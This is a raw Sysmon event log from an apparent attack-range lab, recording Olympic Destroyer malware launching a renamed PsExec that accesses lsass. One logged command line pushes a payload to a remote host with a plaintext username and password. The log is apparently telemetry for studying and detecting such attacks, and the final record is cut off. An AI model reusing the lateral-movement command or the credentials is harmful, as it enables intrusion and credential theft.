534500x8000000000000000291383Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.467{C8EA50B7-12F0-6216-9305-000000003802}6696C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291382Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.467{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12F0-6216-9305-000000003802}6696C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291381Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.467{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12F0-6216-9305-000000003802}6696C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291380Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.462{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F0-6216-9605-000000003802}6656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291379Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.462{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F0-6216-9605-000000003802}6656C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291378Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:48.446{C8EA50B7-12F0-6216-9305-000000003802}6696C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291377Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.446{C8EA50B7-12F0-6216-9605-000000003802}66566632C:\Windows\system32\conhost.exe{C8EA50B7-12F0-6216-9405-000000003802}6612C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291376Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.414{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12F0-6216-9605-000000003802}6656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291375Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.414{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F0-6216-9505-000000003802}6616C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291374Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.414{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F0-6216-9505-000000003802}6616C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291373Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.399{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F0-6216-9605-000000003802}6656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000291372Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.399{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4BD3C51D496D2033943CB8392E2C033,SHA256=1CB8462643E2FD1EA768F9DFDF0A5E2CA61EE8BC2D670CED3379BC48A9F9970C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291371Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.399{C8EA50B7-12F0-6216-9505-000000003802}66166692C:\Windows\system32\conhost.exe{C8EA50B7-12F0-6216-9305-000000003802}6696C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291370Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.367{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12F0-6216-9505-000000003802}6616C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291369Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.367{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F0-6216-9505-000000003802}6616C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291368Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.367{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291367Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.367{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291366Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.367{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291365Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.367{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291364Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.314{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291363Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.314{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291362Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.314{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291361Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.314{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291360Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.283{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12F0-6216-9405-000000003802}6612C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291359Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.283{C8EA50B7-12E6-6216-4B05-000000003802}67926932C:\Temp\olympic_destroyer.exe{C8EA50B7-12F0-6216-9405-000000003802}6612C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291358Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.284{C8EA50B7-12F0-6216-9405-000000003802}6612C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.255 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291357Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.283{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F0-6216-9405-000000003802}6612C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291356Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.267{C8EA50B7-12F0-6216-9005-000000003802}6460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291355Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.267{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12F0-6216-9005-000000003802}6460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291354Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.267{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12F0-6216-9005-000000003802}6460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291353Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:48.262{C8EA50B7-12F0-6216-9005-000000003802}6460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291352Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.230{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12F0-6216-9305-000000003802}6696C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291351Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.230{C8EA50B7-12E6-6216-4B05-000000003802}67926872C:\Temp\olympic_destroyer.exe{C8EA50B7-12F0-6216-9305-000000003802}6696C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291350Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.238{C8EA50B7-12F0-6216-9305-000000003802}6696C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - 